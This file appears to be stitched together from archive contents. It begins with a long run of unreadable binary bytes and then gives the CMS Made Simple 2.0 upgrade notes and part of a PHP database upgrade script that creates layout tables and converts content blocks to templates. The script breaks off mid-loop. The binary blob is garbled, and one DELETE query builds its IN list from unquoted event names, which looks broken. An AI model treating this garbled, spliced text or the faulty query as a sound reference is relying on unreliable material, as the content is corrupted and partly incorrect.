�)|�9.jKw�8�-�Z�1�ͬg�S��x>b���Э>�(��+%�2X&�A�l�-�j=���1���Q����8B�Rn1��͔�@}��|2�9��z���pR6���7VS�SӉ�MN=����%"�]���3�~y��)p�ٹ��Q��SR�E#ݶ��`�)�y��Į-�,�4��/�g:ň�=T�M>�\�if�P�U�hP���+O�-tl�crX���'�A�E#ͺb�5�;9@ЦuЋf��=��Yƹ����$��cK���yz�3u�	v!���:
oV�z?]x�P�fЀ'Gc�����#m=���)
}B`��<h�.[�%-�Z6�%�זj;>#w�I�e�
b2�ks�V�`%�)�2���z�H����j{uч
AHaL��5-$PR?����r���|�_M��./^��[���h��ݡ�j�Ş�>�N@��"��Gw��]-i6(3K��h�I�I
T5�b�·6#�fa�A�$p�3�lzպNDzM��6ǽ��zRm�����6Ȼ��K@ĽL�և��Ez:l�5㴋RA@���K#��\�^� ���RI�����\6��p.�(��>=�pɷ�����F�-i�Op5�
�=T�����#3�:̅#�|A����i����cC������d;���kKFY���&�:|B�����7��@�z���v�т,.J��|٪m��ShP)ݰ'(���Q�8{��i��T|�^��6�o�Yۂw��w�0�.�G��2P�A�z�T���𭗍t��	B@����E/�]����C���a�3Z�ԑ1tP�-Ps�!�J�KGY�ڠ<>��Xc��}�/V4_��|��YI+��{.P�f}ԾU�6qu\6��f�,���68P��^�: \��/!�L�E{cpVJ }=	�c�e�z��G��Oj���n��V�궒�Ew���4!��$�'F��
A{	Zw�������շ�z�α$@)([�A���R�{ȃ�'B��l+��Y�����,���D :����}��S=L�:u�_#w�>�ڲ��m��(�Y8�:(^�z��а��딀u�K�e�GF��U�0��!��zk�#��
Tz�B_�0����� �:(���W��a�B������Ȕ�4@,֮&�
w}WJo�e+LJ�WO�-������5�F)b��e,x,��Ƒ�QnE���'j�\�w����>��XMK���Ns���|��a�i�Z�OK0�B+�_B⑵��\aY��R�U7oMh�Bׇf����!�6%iA��/״�Z,�G�7��_4��V�:�`�����:�6��m��g;K^��e�PL��G3��KP�9W�/<�i(��K�;�X��g=��+7.ӂ�/�g�^�fj�;-�ʡyǦ��
��/ܟ%f�W�F"(]������ɕ�{k���7��@3�
I�pӹ�5�حy�m�څg�Kg�%KT#�'i���$S�z�B�BN�=��>�����6z�RG�t���"J�L���2"���`�~�˅:7�֦KR�
�*�v���]�g;�V
 @�v��$8�*�o*_�xe�j8˵X�`��Qc�D�f��{˔�#�a<�\[E��n��������+�O���:��i�����R�Ts�GXZ�R�i<U]HS�vb)���������>4��sJڡ�1pVO�z!?�ΰuD�Ĵ<��`�ȵDZ����[/�����
f3�ֺ�%h9�9�KϮ�4��b�c���t�!���r���<�Ͻ��F���`��m�`�!��t�P�sY������%qu��ߔ8��#�+0Rm�4%Ե��猵j�Ŀ�ȩ�ܪ�>P-��s���9�#���s0`MA�4h���[(�&Z��w����������l*7�4z�g�A1#"�����hL����`���a������O�X�9��p��3�ׯH�}΋�s���{�F�� ���Q��N�6ًyLk[�AE���c��J�|�O5sL��g
w�(D�K��^Rq�22 &��w�tLU���_�f�~;�:Ѧõh���%Nb-05�7@˟=��Nnf�.)d`E���a�9gT���uGm6�6`��C%��5i��Pg����S��Y6�o0@��Ϟ�^�i��`�?�8x���g{�y��(^rm�)����gӘu)��_���6I����f�E�VP�6��a�!2�`G�����������q�?{�?O��K���fP��.�,���=@�
���]kod7r�G	ߏ��$�`��P$�k�I�4�:�>�4��^�����Fn��ۼd�9dU��|��m�gݖlG�n���_=T�`oX��Rj�]\;����<><~~���Jѓtҫˬm2�����m��l�lo�_3_���P�͊]-C��i��\��/�wϧ�:f��	>,�v�a���}�K������{�toN�n�qf�����L
dul����!�����gFۀ��)M�(j 0�������1۟�)||(�8Y~�:n�Hvd�@)ifk�#���~gr�@�}�y��1���]��6cy�!���g�V\)��`�Y��$6O��e���ʢ���؊Z\�`�r��>�,���i�"x��-��""A��&��].�;�c���s����P A��]뙌��*��Y���4��x�1)÷CVw�B�W5f^�u��*BY8%2�;6�{��3���{y������9�0�4�du�
��(H�y�1�&o!�>G�i{���]����a:
k���W�m_gǬ�rpX���*�:�}�x;���2a:U�O����@�R`�%$�8du��oRsl3a�qxU�����j��]�F3٥e7ᤪgw#+����Yș<8���'\t
�
�ѕ���Ǚ;~�y	��c>/"����v�y۾���Ux�$⍧�	�˖��} �1���ß�8����&U��-V3����籕��IW�~��dق�>)<�k���]|����<NxT
]�W��'t*R��3Ψ�V��V���k���m!�,a6w����୧��>Q�7�PWG�6f�y��
k&u����3#�� ��@3���ʒ��b�X�B����vWy5����^�++2���������O|뎭���"����U^�T�z|�����س�n�0�5��G10���$�s�%S����%b^���YL��
�4�TB<6�[(?�5�]���f�Xn�0���"��:a�Q�V&;Q���e��l�س��~���b�FnL��,`�p�a�t���^��+'� xC�K�	\���2�b��$ٜfUɿtp���[���
P�lB3#w����Ukm���1?��7�����@k�ن_2͠P4��.�/�X�.�~�R?����>�v��[#
��,�ܢ�`6�T&;4}{w{�'^�U��MqրG��|e�%)����J��S�c}k�&�P�V�s@�\�l��J�_�f��ß~��t�����_o��ï�3'���1N=�H{e�t
֙ܝ���y������>ܿ��X��$�Oc��������6�qϰn#esv�3SA5�r��Gp^|p1e��ߝkF���D���'�" �:
b�)�y���tO���$
cb������#ڰc$3�΀����vx���e$�h�Iİ�7������lp�.�{[5z۱�b� �b��w���y��郏��?�>�2�?x�wK�:`�^��Yb��޶^<o�Q�_���_(1�#�ۧ��T6�	5�}æ�x�������e��"!=aCUA�I�M
r����~��ߟ�K�`	��T�R���{�X?7f��QNoc3
i$@����Rj5���d;��]�|�^[(6�A���A�$|�p�8�jm�5rl�k�aY��-���|�8�*j�ZBX�	��4��Bf�Q�n��b�eݱ��'�����
Hz�r�	�b�e�nh�Ld��6d�MCyQ&�^1β�4�f���3�Qe�3�[���gm�q����z),n&�Kv��}�YV4���e3��#Ϋ��nN/��� �ݼ�,+'�֪�52�����j�d�b�e�\�-��V	�n4�ǬY��n��z�8�z9;�� 
��>�gRɾ���u�ʫ���e����mE�Pl���,��
cg��^sL�Y��C
��5~tY]V{�����T?�/�	��^�O��e�QR�X��^����K�fm��e�T-���*Xm<-h�S(F���eeQbQ��G����ٽ�\������)��'�5�p� ��d^��vM�YV���T0s!a�و(t�Mq�t5β'PVft;F�٭+�m�L���k��ҿ� �|-?�����B�e��,+J&5�}(-
��ة�I�����u���Вzrcv,�d|��-P�^�G�uI�ق1�d��̎]QA�b&^�ޖ�@�(j&�����搌!r	^��u�O�\�g�W�#F纒��k������̂9�.�T5�)iD�R&�k��2�?�����}lX�>X�i�0�L�q���8*t��[��v l�{*�ew�k��.�#i��T׶Tz̩Q\�;a�Q�J)�v�p�{���~��m�{�Xya��Յ:��b�dn�3�����O�C�ӹ/�T�)Q)�c%^n�oV��=���2���9o�{��Y
���IF��Xpv<#;��m1�{{o�"M�!OF7�l ٝ�L#[�g[<�܂/�὜��{���O�6[,ӎL�jg�}L��e�c���+:c���xȼ����i����~��m�ק�������u�c����Z�Э�M��m����j>�kK

��m��A�CEg:�i������Kkͨ�Ns*�u�����	��7�>+�K�U�|���L;3�*/�l���sU*�
`W�h�uz��m��+��AUba
�g�I��_��Ͷzʋ�����mJ�X^������%L���ʬ�18ǻ�
���n+6_[&�ˮ�7��~,����Ȅ}@;`w�[A�/8���8�O/Xa�U��K�\A���	V[���jXn4��=�\a5 �`�9[�-����
�ƚ#vW�ŕQLu3[H�Jwp ��@w��R�³���j9�
60�vL��b�]�Lv����}��J
�`[���Xh~W2��9�`��@R$a}b�
�6ʑ�}�t��9��A��n:�V"�lF�ӏ���~���cK>6��Y(J?k��#�m)`�JӉ�(:euհ�e�C�T��0��㌠�,d�a�qn�-�y^Y�gΆ�4m�x.&��RMM�SG��R��9,��YZ�5m �Z��ҏ싥6F(���j���8�b����q��R���;�Zl���5�#�V�hE���^��zd���`�������(���Ͷ&?#�<bs��ۖ>g��J�F�,���L��� �ǔ���J �e�[LBE�H�\&��/e:���R��E���0�H��j�S��hV�O�$2x�(���!�e�MmlS{d�-52>Ư�E2�AH0 Ƀ'����V4�+��H�$?��)n����<��&sh_,e2�27!Y)a��a�D�'��v�:�=u���0ԫ�:�H���r��,�2�0�~��4 �5��I�JqZ$^�����{��T$ T�穝3{4#O��GU��\���yѐ�ω
��,rW9�'P�ci��}����Ś/5-�Y��9A"�Y�^���Ry�?}�"�Y���`R���ء{"�)�2�:���	� �����gg��f��%����R5ִ@�C�Sk���e.�V6���I��T�z�/�ׇ�|�B��j|W��x#��d�n[w|5���K_xKUYW(ݨ�XG���[�����������j�ZH9��Y
X�Fpya��Ş���7�V�a�3VS�	�0��;&�����j�k�e��(�Dy����mgc��x�x��9굦4 5���%DVm�l;N�^)�9��-�b)�j(�v�Tឍ�rɺ�q�4po�^�t_I���IV����K���)�O��aj�]5ب��"��,�͂9�����3�>Yj*�L���c�gq{�5�Y��}�|�v�6�ͫ��	�k���L�(�"����sF��z7п���Y�3kAw1�j,�W�T��s>0�ہ<��)���W����Xjؼ,{�a�k�h�,I�Y���,X~��d�P�Z�7�G�s������8��>���6����{7uvaV�5��n���SK�f|�����01�En���yv���A�
8අ�������4���x�TX��2.��B3ƛ��˽b�����'y���S���Y&x>e��tD|�أ�����?��za��H���_����n���xw�M~ӫ6��耚[�k%tv+�-Uw�~۝��l_NJ�E�D]����]{�o�K^~{���;���`cl_4�k�y9NB�{�$_������������o�eoc]?j?%�@b��o�����6���<���|EL;�- �&�i#�x�)��6�l���o=\���&�So��f}\�c6_��>����a5��"
|G��
�
�5y����O���\��+�����`�_CMS Made Simple Version 2.0
---------------------------

NOTE: This is a major upgrade and a significant amount of code has changed in this version.
NOTE: Many sites will not upgrade cleanly.  You may need to spend some time resolving various errors.
NOTE: The CMSMS Forum at https://forum.cmsmadesimple.org is an important resource to help you in determining how to solve problems prior to and after upgrading your site.


----------------
BEFORE UPGRADING
----------------
Before upgrading major versions such as this, please ensure that you:
  A:  check all of your modules for compatibility with CMSMS 2.0 before upgrading.
  B:  Ensure you have upgraded all modules to their latest available version, as this should help ensure that your modules are compatible with CMSMS 2.0
  C:  Ensure that you have a verified backup of all of your files and the database before upgrading so that you can restore in case of an error.
  D:  Completely read the announcements, release notes, and any documentation (including the README files distributed with the installation) before proceeding.


---------------
UPGRADE ISSUES:
---------------
A:  Smarty variable scope issues
--
Description: CMSMS has updated the Smarty template engine.  Smarty variables created in one template are no longer automatically available throughout the generation of the page.  You must explicitly copy those variables into another scope using the {assign} smarty plugin, it's shortcut or the new {share_data} plugin.

Symptoms:  After upgrading the site you may see one or more notices, warnings, or fatal errors about 'undefined index variablename'.  and other related messages.

Solution:  You need to find the location where the 'undefined' variable was created and copy it to a global scope.   Using the AdminSearch mechanism is a good way to find instances where these variables are used and/or created.   Once you find the template that the variable was created in,  you can alter the template to copy the variable into the global scope for use by other templates.  One way to do this is via the {assign} smarty plugin (or it's short form).  i.e:  {assign var=foo value=$foo scope=global}.  Another way is to use the {share_data} plugin that was created for CMSMS 2.0.  i.e: {share_data vars='title,description,foo'}


B:  Smarty security issues
--
Description:  CMSMS has enabled the built in smarty security mechanism to prevent editors, or content submitters from entering potentially unsafe smarty code.

Symptom:   You will see the 'Oops' error page with a message like:  access to **something** not allowed by security setting

Solution:  You can enable permissive smarty by adding $config['permissive_smarty'] = 1; into your config.php file.

Warning:  We do not recommend the use of permissive smarty on websites that allow submission of content by untrusted users.  i.e:  if you are using a module such as CGFeedback or AComments, or allowing news or blog article submission, or uploads by untrusted users, you should not use this setting.


C:  Sites that use multiple templates of the same name will have difficulties.
--
Description: If for example your page template is called 'MySite' and your MenuManager template is also entitled 'MySite', then there will be difficulty with the upgrade to CMSMS 2.0.  This is because the Design manager module (new for 2.0) treats all templates alike, and therefore requires that each template has a unique name. The upgrade process will ensure that all templates will have a unique name, however it WILL NOT touch your templates.  Therefore if you did not correct this situation before the upgrade you may encounter errors.

Symptoms:  If you get a white screen immediately after upgrade, that takes quite a while (up to your PHP time limit) to complete.  And/or you get errors like stack overflow" or "timeout" or "insufficient php memory" this may be the cause.

Solution:  Go into the design manager and find the new name for your child template (i.e: News, MenuManager, or some template from a third party module) and change the appropriate call in your page template.    i.e:  If You call {menu template='MySite'} in your page template, you will need to alter that call to specify the new template name.


D:  invalid characters in the template or stylesheet names.
--
Description:  Previous versions of CMSMS did not have tight controls on the characters that could be used in template and stylesheet names, GCB's, UDT's, etc.  This presented numerous difficulties over time.   In CMSMS 2.0 we have tightened the range of characters that can be used.  Typically these are alphanumeric characters, spaces the comma, dot, dash, and colon (:).  And some UTF-8 characters, but nothing that is not URL safe.

The CMSMS installation assistant will clean item names (templates, designs, collections, stylesheets) on upgrade, and this result in errors on your site.  The errors may be something like 'template not found: cms_template:foo'.   You can resolve these errors by making the appropriate changes in your templates.  The AdminSearch utility may be useful in finding
the places where changes are needed.


E:  Database stylesheets whose name ends in .css will be renamed
--
Description:   The extension .css is reserved for future file based CSS functionality.   Therefore any database stylesheets ending in .css will be renamed.

Symptoms:  You may either see the 'Oops' error page, or you may have a styling problem.  This is because the upgrade may have renamed your stylesheets.  If you are referring to stylesheets by name you may see an error message.

Solution:  Find the new name of the stylesheet from within the Design Manager and adjust your page templates accordingly.   The AdminSearch module may be of assistance here.


F:  Database templates  whose name ends in .tpl will be renamed
--
Description:  The extension .tpl is reserved for file based template functionality (useful in modules). Therefore any database templates ending in .tpl will be renmed.

Symptoms:  You see the 'Oops' error page with a message like:  Unable to load template cms_template 'something'

Solution:  Find the new name of the stylesheet from within the Design Manager, and adjust your page templates accordingly.  The AdminSearch module may be of assistance here.


G:  Third party plugins in the lib/smarty directory
--
Description:  Third party plugins that were manually installed into the lib/smarty/libs/plugins directory will be deleted on upgrade.

Symptoms:  You see the 'Oops' error page with a message like:  Syntax error in template "tpl_body:7"  on line 67 " {invalid_plugin} unknown tag "invalid_plugin"

Solution:  Copy the plugin file from your backup to the <CMSMS ROOT>/plugins directory


H:  Old plugins may not function
--
Description:  Some plugins that were formerly part of the core, or have been deprecated, and may no longer function.  i.e: some plugins like {toggle_open} and {toggle_close}

Symptoms:  You see the 'Oops' error page with a message like: Syntax error in template "tpl_body:7"  on line 67 " {invalid_plugin} unknown tag "invalid_plugin"

Solution:  Comment out the plugin call from within your template using {* and *} ... or replace the plugin with a different one.

Note:  Plugins that ended in the name 'close' will not function in CMSMS 2.0.  i.e:  {toggle_close}.


I:  Module use of CMSMailer
--
Description:  Some modules or plugins may use the CMSMailer module to send email messages, without explicitly declaring a dependency (modules).  The functionality for sending emails has been internalized into the CMSMS API's, and the CMSMailer module is usually not installed by default on an upgrade.

Symptoms:  Various symptoms.... fatal errors or warnings related to sending emails, or accessing a property of a non object in functionality that sends mail.

Solution:  From within the ModuleManager module, install the CMSMailer module.


----------------
WHAT HAS CHANGED
----------------
Note:  This is only a brief list of the major items that changed in CMSMS 2.0.  For more information you are encouraged to view the CMSMS docs site at
https://docs.cmsmadesimple.org and the forum at https://forum.cmsmadesimple.org

1.  New Smarty
    - Introduces variable scopes
    - Introduces the smarty security policy
2.  New Template, Stylesheet and Design paradigm
    - GCB's are now Generic templates.  There is no WYSIWYG functionality on generic templates.
    - All templates must be uniquely named
    - All stylesheets must be uniquely named
    - MenuManager, Navigator, Search, and News converted to use new paradigm
3.  New Content Manager module
    - Pagination, Filtering and Find
    - Now handles many more content pages
    - Locking to prevent accidental overwrites
4.  New Design Manager module
    - Handles Designs, Templates, Stylesheets, and Categories
    - Locking to prevent accidental overwrites
    - Has import and export functionality
    - Makes module development easier as module authors do not need to manage templates.
5.  New AdminSearch module
    - Allows searching through page content, templates, and stylesheets for various strings
6.  New Navigator Module
    - Allows building navigations recursively, is faster, and supports more flexibility.
    - Templates are much easier to understand
7.  Enhanced and improved ModuleManager module
    - See stale, new, and old modules at a glance
    - Easier to use
8.  Performance enhancements
    - Throughout the core with a focus on speed improvements for frontend rendering.
9.  Removed CMSPrinting
    - A UDT is used as a stub to prevent errors from this.  But there is no printing module distributed in the core.
10. Removed old, seldom used plugins
11. Improved admin theme and API
12. Improved admin navigation
13. Internalize CMSMailer
    - CMSMailer classes are now in the core API.  CMSMailer functionality is only a stub function for compatibility for those modules that need it.
14. UTF-8 URL Slugs
    - Just like domain names can have utf-8 characters,  URL slugs in CMSMS can now contain utf-8 characters.
15. API Changes
    - API Changes will break some modules.  Check for compatibility before upgrading.
16. More config options
more....
    - Almost everything has been adjusted in some way.
<?php

set_time_limit(3600);
status_msg('Fixing errors with deprecated plugins in versions prior to CMSMS 2.0');
$fn = $destdir.'/plugins/function.process_pagedata.php';
verbose_msg('deleting file '.$fn);
if( file_exists($fn) ) {
  @unlink($fn);
}
status_msg('Upgrading database for CMSMS 2.0');

$gCms = cmsms();
$dbdict = NewDataDictionary($db);
$taboptarray = array('mysql' => 'TYPE=MyISAM');

verbose_msg('updating structure of content tabless');
$sqlarray = $dbdict->DropColumnSQL(CMS_DB_PREFIX.'content',array('collaapsed','markup'));
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->AlterColumnSQL(CMS_DB_PREFIX.'content_props', 'content X2');
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_content_by_modified', CMS_DB_PREFIX."content", 'modified_date');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('add index to the module plugins table');
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_smp_module', CMS_DB_PREFIX."module_smarty_plugins", 'module');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('updating structure of the permissions table');
$sqlarray = $dbdict->AddColumnSQL(CMS_DB_PREFIX.'permissions','permission_source C(255)');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('add index to user groups table');
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_ug_keys', CMS_DB_PREFIX.'user_groups ','group_id, user_id',array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('deleting old events');
$tmp = array('AddGlobalContentPre','AddGlobalContentPost','EditGlobalContentPre','EditGlobalContentPost',
         'DeleteGlobalContentPre','DeleteGlobalContentPost','GlobalContentPreCompile','GlobalContentPostCompile',
         'ContentStylesheet');
$query = 'DELETE FROM '.CMS_DB_PREFIX.'events WHERE originator = \'Core\' AND event_name IN ('.implode(',',$tmp).')';
$return = $db->Execute($query);

// create new events
verbose_msg('creating new events');
Events::CreateEvent('Core','AddTemplateTypePre');
Events::CreateEvent('Core','AddTemplateTypePost');
Events::CreateEvent('Core','EditTemplateTypePre');
Events::CreateEvent('Core','EditTemplateTypePost');
Events::CreateEvent('Core','DeleteTemplateTypePre');
Events::CreateEvent('Core','DeleteTemplateTypePost');
Events::CreateEvent('Core','AddDesignPre');
Events::CreateEvent('Core','AddDesignPost');
Events::CreateEvent('Core','EditDesignPre');
Events::CreateEvent('Core','EditDesignPost');
Events::CreateEvent('Core','DeleteDesignPre');
Events::CreateEvent('Core','DeleteDesignPost');

// create new tables
verbose_msg('create table '.CmsLayoutTemplateType::TABLENAME);
$flds = "
         id I KEY AUTO,
         originator C(50) NOTNULL,
         name C(100) NOTNULL,
         has_dflt I1,
         dflt_contents X2,
         description X,
         lang_cb     C(255),
         dflt_content_cb C(255),
         requires_contentblocks I1,
         owner   I,
         created I,
         modified I";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_type_1', CMS_DB_PREFIX.CmsLayoutTemplateType::TABLENAME, 'originator,name', array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutTemplateCategory::TABLENAME);
$flds = "
         id I KEY AUTO,
         name C(100) NOTNULL,
         description X,
         item_order X,
         modified I";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplateCategory::TABLENAME, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_cat_1', CMS_DB_PREFIX.CmsLayoutTemplateCategory::TABLENAME,
                                    'name',array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutTemplate::TABLENAME);
$flds = "
         id I KEY AUTO,
         name C(100) NOTNULL,
         content X2,
         description X,
         type_id I NOTNULL,
         type_dflt I1,
         category_id I,
         owner_id I NOTNULL,
         created I,
         modified I";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_1', CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, 'name',array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_tpl_2', CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME, 'type_id,type_dflt');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutStylesheet::TABLENAME);
$flds = "
         id I KEY AUTO,
         name C(100) NOTNULL,
         content X2,
         description X,
         media_type C(255),
         media_query X,
         created I,
         modified I";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutStylesheet::TABLENAME, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_css_1',CMS_DB_PREFIX.CmsLayoutStylesheet::TABLENAME, 'name', array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutTemplate::ADDUSERSTABLE);
$flds = "
         tpl_id I KEY,
         user_id I KEY
        ";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutTemplate::ADDUSERSTABLE, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutCollection::TABLENAME);
$flds = "
         id   I KEY AUTO,
         name C(100) NOTNULL,
         description X,
         dflt I1,
         created I,
         modified I
        ";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TABLENAME, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'idx_layout_dsn_1',CMS_DB_PREFIX.CmsLayoutCollection::TABLENAME, 'name', array('unique'));
$dbdict->ExecuteSQLArray($sqlarray);


verbose_msg('create table '.CmsLayoutCollection::TPLTABLE);
$flds = "
         design_id I KEY NOTNULL,
         tpl_id   I KEY NOTNULL
        ";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::TPLTABLE, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);
$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_dsnassoc1', CMS_DB_PREFIX.CmsLayoutCollection::TPLTABLE, 'tpl_id');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLayoutCollection::CSSTABLE);
$flds = "
         design_id I KEY NOTNULL,
         css_id   I KEY NOTNULL,
         item_order I NOTNULL
        ";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLayoutCollection::CSSTABLE, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('create table '.CmsLock::LOCK_TABLE);
$flds = "
         id I AUTO KEY NOTNULL,
         type C(20) NOTNULL,
         oid  I NOTNULL,
         uid  I NOTNULL,
         created I NOTNULL,
         modified I NOTNULL,
         lifetime I NOTNULL,
         expires  I NOTNULL
        ";
$sqlarray = $dbdict->CreateTableSQL(CMS_DB_PREFIX.CmsLock::LOCK_TABLE, $flds, $taboptarray);
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks1', CMS_DB_PREFIX."locks", 'type,oid', array('UNIQUE'));
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks2', CMS_DB_PREFIX."locks", 'expires');
$return = $dbdict->ExecuteSQLArray($sqlarray);

$sqlarray = $dbdict->CreateIndexSQL(CMS_DB_PREFIX.'index_locks3', CMS_DB_PREFIX."locks", 'uid');
$return = $dbdict->ExecuteSQLArray($sqlarray);

// create initial types.
$page_template_type = $gcb_template_type = null;
for( $tries = 0; $tries < 2; $tries++ ) {
    try {
        $page_template_type = CmsLayoutTemplateType::load(CmsLayoutTemplateType::CORE.'::page');
        $gcb_template_type = CmsLayoutTemplateType::load(CmsLayoutTemplateType::CORE.'::generic');
        break;
    }
    catch( \CmsDataNotFoundException $e ) {
        // we insert the records manually... because later versions of the template type
        // add different columns... and the save() method won't work.
        verbose_msg('create initial template types');

        $contents = \CmsTemplateResource::reset_page_type_defaults();
        $sql = 'INSERT INTO '.CMS_DB_PREFIX.\CmsLayoutTemplateType::TABLENAME.' (originator,name,has_dflt,dflt_contents,description,
                    lang_cb, dflt_content_cb, requires_contentblocks, owner, created, modified)
                VALUES (?,?,?,?,?,?,?,?,?,UNIX_TIMESTAMP(),UNIX_TIMESTAMP())';
        $dbr = $db->Execute( $sql, [ \CmsLayoutTemplateType::CORE, 'page', TRUE, $contents, null,
                                     serialize('CmsTemplateResource::page_type_lang_callback'),serialize('CmsTemplateResource::reset_page_type_default'), TRUE, null ] );
        $contents = null;
        $dbr = $db->Execute( $sql, [ \CmsLayoutTemplateType::CORE, 'generic', FALSE, null, null,
                                     serialize('CmsTemplateResource::generic_type_lang_callback'), null, FALSE, null ] );
    }
} // tries

    /*
    // if we got here.... the type does not exist.
    $page_template_type = new CmsLayoutTemplateType();
    $page_template_type->set_originator(CmsLayoutTemplateType::CORE);
    $page_template_type->set_name('page');
    $page_template_type->set_dflt_flag(TRUE);
    $page_template_type->set_lang_callback('CmsTemplateResource::page_type_lang_callback');
    $page_template_type->set_content_callback('CmsTemplateResource::reset_page_type_defaults');
    $page_template_type->reset_content_to_factory();
    $page_template_type->set_content_block_flag(TRUE);
    $page_template_type->save();

    $gcb_template_type = new CmsLayoutTemplateType();
    $gcb_template_type->set_originator(CmsLayoutTemplateType::CORE);
    $gcb_template_type->set_name('generic');
    $gcb_template_type->set_lang_callback('CmsTemplateResource::generic_type_lang_callback');
    $gcb_template_type->save();
    */
if( !is_object($page_template_type) || !is_object($gcb_template_type) ) {
    error_msg('The page template type and/or GCB template type could not be found or created');
    throw new \LogicException('This is bad');
}

$_fix_name = function($str) {
    if( CmsAdminUtils::is_valid_itemname($str) ) return $str;
    $orig = $str;
    $str = trim($str);
    if( !CmsAdminUtils::is_valid_itemname($str[0]) ) $str[0] = '_';
    for( $i = 1; $i < strlen($str); $i++ ) {
        if( !CmsAdminUtils::is_valid_itemname($str[$i]) ) $str[$i] = '_';
    }
    for( $i = 0; $i < 5; $i++ ) {
        $in = $str;
        $str = str_replace('__','_',$str);
        if( $in == $str ) break;
    }
    if( $str == '_' ) throw new \Exception('Invalid name '.$orig.' and cannot be corrected');
    return $str;
};

$_fix_css_name = function($str) {
    // stylesheet names cannot end with .css and must be unique
    if( !endswith($str,'.css') && CmsAdminUtils::is_valid_itemname($str) ) return $str;
    $orig = $str;
    $str = trim($str);
    if( !CmsAdminUtils::is_valid_itemname($str[0]) ) $str[0] = '_';
    for( $i = 1; $i < strlen($str); $i++ ) {
        if( !CmsAdminUtils::is_valid_itemname($str[$i]) ) $str[$i] = '_';
    }
    for( $i = 0; $i < 5; $i++ ) {
        $in = $str;
        $str = str_replace('__','_',$str);
        if( $in == $str ) break;
    }
    if( $str == '_' ) throw new \Exception('Invalid name '.$orig.' and cannot be corrected');
    return $str;
};

$fix_template_name = function($in) use (&$db,&$_fix_name) {
    // template names have to be unique and cannot end with .tpl
    if( endswith($in,'.tpl') ) $in = substr($in,0,-4);
    $in = $_fix_name($in);
    $name = CmsLayoutTemplate::generate_unique_name($in);
    if( $name != $in ) {
        error_msg('Template named '.$in.' conflicted with an existing template, new name is '.$name);
    }
    return $name;
};

// read gcb's and convert them to templates.
// note: we directly write the the CmsLayoutTemplate table instead of using the CmsLayoutTemplate API because
// the database structure changed between 2.0 and 2.1 (listable column) and the CmsLayoutTemplate class relies on a listable colum which may
// not yet exist.
verbose_msg('convert global content blocks to generic templates');
$query = 'SELECT * FROM '.CMS_DB_PREFIX.'htmlblobs';
$sql2 = 'INSERT INTO '.CMS_DB_PREFIX.CmsLayoutTemplate::TABLENAME.' (name,content,description,type_id,type_dflt,owner_id,created,modified) VALUES (?,?,?,?,0,?,UNIX_TIMESTAMP(),UNIX_TIMESTAMP())';
$gcblist = null;
$tmp = $db->GetArray($query);
if( is_array($tmp) && count($tmp) ) {
    // for each gcb, come up wit a new name and if the new name does not exist in the database, create a new template by that name.
    foreach( $tmp as $gcb ) {
        $new_name = $fix_template_name($gcb['htmlblob_name']);
        try {
            $template = CmsLayoutTemplate::load($new_name);
            // nothing here, template with this name exists.
        }
        catch( \CmsDataNotFoundException $e ) {
            $db->Execute($sql2,array($new_name,$gcb['html'],$gcb['description'],$gcb_template_type->get_id(),$gcb['owner']));
            $gcb['template_id'] = $db->Insert_ID();
